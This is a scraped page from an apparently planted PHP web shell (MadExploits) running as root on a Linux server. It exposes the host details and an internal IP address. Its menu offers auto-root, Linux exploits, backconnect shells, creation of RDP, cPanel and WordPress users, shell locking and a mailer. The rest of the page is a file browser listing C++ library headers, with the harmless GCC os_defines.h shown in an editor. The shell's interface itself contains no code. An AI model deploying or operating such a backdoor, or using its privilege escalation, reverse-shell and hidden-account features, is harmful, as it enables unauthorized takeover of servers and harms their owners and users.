Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
x86_64-linux-gnu /
c++ /
14 /
bits /
[ HOME SHELL ]
Name
Size
Permission
Action
atomic_word.h
1.48
KB
-rw-r--r--
basic_file.h
3.84
KB
-rw-r--r--
c++allocator.h
2.03
KB
-rw-r--r--
c++config.h
56.42
KB
-rw-r--r--
c++io.h
1.88
KB
-rw-r--r--
c++locale.h
3.47
KB
-rw-r--r--
cpu_defines.h
1.3
KB
-rw-r--r--
ctype_base.h
2.26
KB
-rw-r--r--
ctype_inline.h
2.23
KB
-rw-r--r--
cxxabi_tweaks.h
2.05
KB
-rw-r--r--
error_constants.h
4.92
KB
-rw-r--r--
extc++.h
2.6
KB
-rw-r--r--
gthr-default.h
24.96
KB
-rw-r--r--
gthr-posix.h
24.96
KB
-rw-r--r--
gthr-single.h
6.65
KB
-rw-r--r--
gthr.h
5.79
KB
-rw-r--r--
messages_members.h
4.41
KB
-rw-r--r--
opt_random.h
6.05
KB
-rw-r--r--
os_defines.h
3.61
KB
-rw-r--r--
stdc++.h
4.72
KB
-rw-r--r--
stdtr1c++.h
1.7
KB
-rw-r--r--
time_members.h
2.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : os_defines.h
// Specific definitions for GNU/Linux -*- C++ -*- // Copyright (C) 2000-2024 Free Software Foundation, Inc. // // This file is part of the GNU ISO C++ Library. This library is free // software; you can redistribute it and/or modify it under the // terms of the GNU General Public License as published by the // Free Software Foundation; either version 3, or (at your option) // any later version. // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // Under Section 7 of GPL version 3, you are granted additional // permissions described in the GCC Runtime Library Exception, version // 3.1, as published by the Free Software Foundation. // You should have received a copy of the GNU General Public License and // a copy of the GCC Runtime Library Exception along with this program; // see the files COPYING3 and COPYING.RUNTIME respectively. If not, see // <http://www.gnu.org/licenses/>. /** @file bits/os_defines.h * This is an internal header file, included by other library headers. * Do not attempt to use it directly. @headername{iosfwd} */ #ifndef _GLIBCXX_OS_DEFINES #define _GLIBCXX_OS_DEFINES 1 // System-specific #define, typedefs, corrections, etc, go here. This // file will come before all others. // This keeps isalnum, et al from being propagated as macros. #define __NO_CTYPE 1 #include <features.h> // Provide a declaration for the possibly deprecated gets function, as // glibc 2.15 and later does not declare gets for ISO C11 when // __GNU_SOURCE is defined. #if __GLIBC_PREREQ(2,15) && defined(_GNU_SOURCE) # undef _GLIBCXX_HAVE_GETS #endif // Glibc 2.23 removed the obsolete isinf and isnan declarations. Check the // version dynamically in case it has changed since libstdc++ was configured. #define _GLIBCXX_NO_OBSOLETE_ISINF_ISNAN_DYNAMIC __GLIBC_PREREQ(2,23) // Glibc 2.26 on i?86/x86-64/ia64/ppc64le added *f128 support. // Glibc 2.27 added it also on many other arches but those have IEEE quad // long double. #if __GLIBC_PREREQ(2, 26) \ && (defined(__i386__) || defined(__x86_64__) || defined (__ia64__) \ || (defined(__powerpc__) && defined(_ARCH_PWR8) \ && defined(__LITTLE_ENDIAN__) && (_CALL_ELF == 2) \ && defined(__FLOAT128__))) # define _GLIBCXX_HAVE_FLOAT128_MATH 1 #endif // Enable __cxa_thread_atexit to rely on a (presumably libc-provided) // __cxa_thread_atexit_impl, if it happens to be defined, even if // configure couldn't find it during the build. #define _GLIBCXX_MAY_HAVE___CXA_THREAD_ATEXIT_IMPL 1 #ifdef __linux__ // The following libpthread properties only apply to Linux, not GNU/Hurd. # if __GLIBC_PREREQ(2, 27) // Since glibc 2.27 pthread_self() is usable without linking to libpthread. # define _GLIBCXX_NATIVE_THREAD_ID pthread_self() # else // Before then it was in libc.so.6 but not libc.a, and always returns 0, // which breaks the invariant this_thread::get_id() != thread::id{}. // So only use it if we know the libpthread version is available. // Otherwise use (__gthread_t)1 as the ID of the main (and only) thread. # define _GLIBCXX_NATIVE_THREAD_ID \ (__gthread_active_p() ? __gthread_self() : (__gthread_t)1) # endif # if __GLIBC_PREREQ(2, 34) // Since glibc 2.34 all pthreads functions are usable without linking to // libpthread. # define _GLIBCXX_GTHREAD_USE_WEAK 0 # endif # if defined(_TIME_BITS) # if _TIME_BITS == 64 # undef _GLIBCXX_TIME_BITS64_ABI_TAG # define _GLIBCXX_TIME_BITS64_ABI_TAG [[__gnu__::__abi_tag__("__time64")]] # endif # endif #endif // __linux__ #endif
Close